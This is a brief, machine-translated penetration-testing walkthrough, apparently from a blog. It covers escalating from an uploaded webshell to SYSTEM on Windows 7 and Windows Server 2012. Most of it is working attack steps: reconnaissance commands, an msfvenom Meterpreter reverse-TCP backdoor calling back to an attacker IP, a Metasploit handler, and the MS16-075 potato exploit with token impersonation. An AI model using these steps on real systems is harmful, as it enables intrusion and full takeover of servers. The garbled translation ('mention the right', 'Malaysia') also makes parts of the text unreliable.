A, win7
1, webshell uploaded to the server, access
2, because win7 permissions not set up, lead to any command can be executed
Direct reference to the right to succeed, you can also provide the right to use exp by msf tools, today it's too late to do the
Two, win2012
1, written put Malaysia on the web server
2, the test machine visit Malaysia, execution whoami executed successfully, the account is iis service
3, execute systeminfo server system to obtain patch information
4, try to net user can view the user, using the net user / add no success
6, upload directory using the test scripts can read and write scripts, test out a readable and writable directory
7, using msfvenom generated backdoor listening port
msfvenom -p windows / meterpreter / reverse_tcp lhost = 192.168.190.158 lport = 1234 -f exe -o ./hack.exe generating backdoor, upload
Monitor the implementation
1)use exploit/multi/handler
2)set PAYLOAD windows/meterpreter/reverse_tcp
3)set LHOST 192.168.190.158 set
4) LPORT 1234
5)exploit
Hack.exe program execution on the target server to mention the right
8, successfully received session
9, the use of msf16-075 be put right, followed by executing the following command
use incognito
list_tokens -u
execute -cH -f ./potato.exe
10, elevated privileges,
After performing ms16-075 mention the right program, execute the following command again, get the current user permissions to NT AUTHORITYSYSTEM permission.
list_tokens -u
impersonate_token "NT AUTHORITYSYSTEM"
guyed
Mention the right to succeed
Finish